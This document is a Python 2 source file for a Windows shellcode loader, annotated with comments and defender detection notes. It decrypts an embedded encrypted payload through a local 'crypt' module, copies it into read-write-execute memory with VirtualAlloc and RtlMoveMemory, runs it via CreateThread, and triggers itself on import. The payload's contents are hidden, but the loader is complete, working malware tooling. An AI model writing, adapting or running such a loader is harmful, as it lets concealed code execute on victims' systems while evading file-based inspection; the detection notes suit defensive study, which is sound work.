import ctypes, crypt
def run():
    """Decrypt the embedded byte blob and execute it in-process on Windows.

    The sequence is the classic in-memory loader pattern: decrypt a
    hex-escaped string, VirtualAlloc a committed RWX region, RtlMoveMemory
    the bytes into it, CreateThread with that region as the start address,
    then block until the thread ends.  Nothing is returned.

    Python 2 code (``print`` statement).  Windows-only: every call goes
    through ``ctypes.windll.kernel32``, which does not exist elsewhere.

    Detection notes for defenders: a private RWX allocation
    (MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE) followed by a
    thread whose start address is not backed by any module on disk is a
    well-known indicator that memory scanners and EDR hooks on
    VirtualAlloc/CreateThread key on.
    """
    # Opaque payload.  It is not executed as-is: the next line passes it
    # through crypt.decrypt(), so the literal is stored encrypted.
    shellcode = "\x2a\xe1\xc7\x37\xb4\x87\x99\xc2\xf9\xc4\x01\xd9\x97\x1b\x12\xf4\x04\xb5\xe4\x3b\x8e\xc3\xeb\x7b\x4e\xe0\x47\xa5\x90\x71\xf3\x51\xa5\x4b\x33\x05\x94\x1d\x2b\xba\x3c\x54\xfd\x65\xd4\x01\xfb\xa8\x52\x09\xb1\x30\x75\xf0\x98\x41\xd2\xc3\x7b\x93\xcb\x13\xe7\xa3\x89\xd8\x1e\xd2\xf8\x5c\xcd\xc4\x77\xb1\x95\x68\xbb\x3f\xd2\x52\xa4\xc5\x1f\x00\xa5\x42\x0d\xe5\x82\x18\x94\xfd\x92\xca\x68\xfe\x5a\x08\xe4\x39\x78\x01\xbe\x92\x33\x09\x5a\x38\x81\x06\x51\x3d\x32\xba\xa6\x9c\x77\x77\xe4\xb0\x0d\x2f\x92\xe2\xf3\x32\x8d\xbe\xcf\x27\x80\xfa\xd6\x19\x54\xe1\xdc\xcf\x29\xde\xb6\x78\x32\x12\xc6\x83\xc9\xb3\xb7\x3d\x34\xfb\xea\x75\x56\xd3\xc3\x7a\x3b\x1d\x80\xd0\x02\xd7\x47\x41\xf1\xbb\xa0\xc6\xf7\x17\x08\x0f\x75\xa6\xf0\xb3\xa7\x1d\xab\x57\xd8\xfe\x2d\x78\xdc\xad\x5e\x5f\xd9\x71\xf5\x4c\xee\x52\x53\x75\xf1\xe8\x3d\xde\x26\x01\x1e\x0c\x79\x9c\x85\x28\x9e\x35\x58\x80\xd4\xd3\xd8\x6d\x14\x37\x72\xe5\x80\xea\xff\x6b\x37\xf5\x38\x87\x66\x19\xd8\x5c\x83\xa7\x7c\x6f\x9a\xc3"
    # NOTE(review): `crypt` here must be a project-local module that shadows
    # the stdlib name -- the standard-library `crypt` has no decrypt().
    # The cipher and key are not visible in this file.
    shellcode = crypt.decrypt(shellcode)
    print "Running shellcode..."
    # Mutable buffer so ctypes can hand out a writable pointer to it below.
    shellcode = bytearray(shellcode)
    # VirtualAlloc(NULL, size, MEM_COMMIT|MEM_RESERVE (0x3000),
    #              PAGE_EXECUTE_READWRITE (0x40)).
    # Writable+executable private memory: the loudest signal in this routine.
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                              ctypes.c_int(len(shellcode)),
                                              ctypes.c_int(0x3000),
                                              ctypes.c_int(0x40))
    # Zero-copy char array over the bytearray, used as the copy source.
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    # RtlMoveMemory(dest=ptr, src=buf, length): stage the decrypted bytes
    # into the executable region.
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                         buf,
                                         ctypes.c_int(len(shellcode)))
    # CreateThread(NULL, 0, lpStartAddress=ptr, NULL, 0, &threadId):
    # the new thread begins executing at the allocated buffer, an address
    # backed by no image on disk.
    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                             ctypes.c_int(0),
                                             ctypes.c_int(ptr),
                                             ctypes.c_int(0),
                                             ctypes.c_int(0),
                                             ctypes.pointer(ctypes.c_int(0)))
    # WaitForSingleObject(ht, -1): -1 is INFINITE, so the caller blocks
    # until the payload thread terminates.
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
# Unconditional module-level call: the loader fires on import as well as
# when the file is executed directly (no __name__ == "__main__" guard).
run()